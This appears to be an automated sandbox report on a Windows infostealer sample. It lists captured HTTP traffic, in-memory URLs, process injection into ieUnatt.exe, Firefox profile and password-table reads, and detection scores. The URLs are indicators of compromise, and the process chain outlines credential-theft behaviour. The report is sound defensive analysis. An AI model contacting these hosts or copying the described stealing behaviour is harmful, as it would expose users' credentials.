                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 11 Jan 2025 03:26:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 11 Jan 2025 03:26:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 11 Jan 2025 03:26:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Sat, 11 Jan 2025 03:26:57 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:27:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abixDaLA%2FAyUIyB7Gyp9r7bsVHdCfNHnxwFLzCmZcXEvvlcmZj%2FmhYVVL4VtOY7%2F%2FADde1zJkLznXDNMc%2Fc%2FjPfycCy4aH%2BSHMKmfRWXY%2FhbF8MRphsh8OPQivIXmnOfUbnN2c25nXs6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9001cfaf0b578cda-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1761&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:27:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWKTe%2BVKrs8SVuEO1Qixa5Z3DhIs65kYAaMdydSsU%2BEjmJAz1uuiCdHr0tAeoY7l1x1LpMhl5WSYp%2FJAEAmUdbbI3SHT88DvbS6w%2BgPLktX%2BxNIUd1MfjqMaKGx4M7wCmauc9uiEhd96"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9001cfbeee308cda-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:27:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eK4381bU4f0y4%2Fst3HTiPCypINiMaFLufdi26j7X%2BqaOtEelLjufxFb%2F0hl4pXkq8j1FZJLBQa6uc%2FMOoOQjkvEYTVzsCUyddZ6DRN1HqwMn6i9c4CXihJN%2Bc7YOL7xR2fCHT%2B0anvVt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9001cfd23f1d1875-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1519&rtt_var=759&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Alesis_DM10.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Camas.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4kDJLB
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/DAT_to_MP3.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/EMI.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4kDJLB%2
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/The_Associates.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2
                Source: ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=1
                Source: ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=2
                Source: ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=MWlFQ2d5amYxYkhvc2pKQXl3UXEzUFhuMVFMYXlyY3I5aGZUSVNHc
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                E-Banking Fraud

                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E929A08_2_04E929A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F5A9A68_2_04F5A9A6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EA69628_2_04EA6962
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E8EA808_2_04E8EA80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F46BD78_2_04F46BD7
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4AB408_2_04F4AB40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E814608_2_04E81460
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4F43F8_2_04F4F43F
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F2D5B08_2_04F2D5B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F475718_2_04F47571
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F416CC8_2_04F416CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4F7B08_2_04F4F7B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4F0E08_2_04F4F0E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F470E98_2_04F470E9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E970C08_2_04E970C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F3F0CC8_2_04F3F0CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E9B1B08_2_04E9B1B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC516C8_2_04EC516C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E7F1728_2_04E7F172
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F5B16B8_2_04F5B16B
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F312ED8_2_04F312ED
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EAB2C08_2_04EAB2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E952A08_2_04E952A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04ED739A8_2_04ED739A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E7D34C8_2_04E7D34C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4132D8_2_04F4132D
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FCF28_2_04F4FCF2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F09C328_2_04F09C32
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EAFDC08_2_04EAFDC0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F47D738_2_04F47D73
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E93D408_2_04E93D40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F41D5A8_2_04F41D5A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E99EB08_2_04E99EB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FFB18_2_04F4FFB1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E91F928_2_04E91F92
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FF098_2_04F4FF09
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E938E08_2_04E938E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EFD8008_2_04EFD800
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04E999508_2_04E99950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EAB9508_2_04EAB950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F3DAC68_2_04F3DAC6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04ED5AA08_2_04ED5AA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F2DAAC8_2_04F2DAAC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F03A6C8_2_04F03A6C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F47A468_2_04F47A46
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FA498_2_04F4FA49
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F05BF08_2_04F05BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04ECDBF98_2_04ECDBF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EAFB808_2_04EAFB80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04F4FB768_2_04F4FB76
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D823908_2_02D82390
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7D2C08_2_02D7D2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7D2B88_2_02D7D2B8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D9C0A08_2_02D9C0A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7B6108_2_02D7B610
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7B6048_2_02D7B604
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7B4C08_2_02D7B4C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D7D4E08_2_02D7D4E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D85A408_2_02D85A40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D83BF98_2_02D83BF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D83C408_2_02D83C40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AE4438_2_051AE443
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AE7E18_2_051AE7E1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AE3288_2_051AE328
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051AD8A88_2_051AD8A8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051ACB638_2_051ACB63
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 04E7B970 appears 272 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 04EC5130 appears 37 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 04F0F290 appears 105 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 04EFEA12 appears 86 times
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: String function: 04ED7E54 appears 98 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Code function: String function: 017AEA12 appears 86 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Code function: String function: 01775130 appears 56 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Code function: String function: 017BF290 appears 105 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Code function: String function: 0172B970 appears 275 times
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Code function: String function: 01787E54 appears 99 times
                Source: BalphRTkPS.exe, 00000000.00000002.2338213007.0000000007510000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000002.2335861440.0000000004049000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000002.2339792394.0000000008160000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000002.2333596788.000000000132E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000002.2334368001.0000000003088000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000000.00000000.2155325332.0000000000C7E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamepldkV.exe< vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameIEUNATT.EXED vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000006.00000002.2499450308.000000000182D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BalphRTkPS.exe
                Source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameIEUNATT.EXED vs BalphRTkPS.exe
                Source: BalphRTkPS.exe Binary or memory string: OriginalFilenamepldkV.exe< vs BalphRTkPS.exe
                Source: BalphRTkPS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: BalphRTkPS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/9
                Source: C:\Users\user\Desktop\BalphRTkPS.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BalphRTkPS.exe.log
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\ieUnatt.exe File created: C:\Users\user\AppData\Local\Temp\086604I_P
                Source: BalphRTkPS.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000317A000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2679445070.0000000003158000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2682620628.0000000003184000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4012150420.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2679876223.000000000317A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: BalphRTkPS.exe ReversingLabs: Detection: 71%
                Source: BalphRTkPS.exe Virustotal: Detection: 68%
                Source: unknown Process created: C:\Users\user\Desktop\BalphRTkPS.exe "C:\Users\user\Desktop\BalphRTkPS.exe"
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Process created: C:\Users\user\Desktop\BalphRTkPS.exe "C:\Users\user\Desktop\BalphRTkPS.exe"
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe Process created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                Source: C:\Windows\SysWOW64\ieUnatt.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\BalphRTkPS.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: wkscli.dll
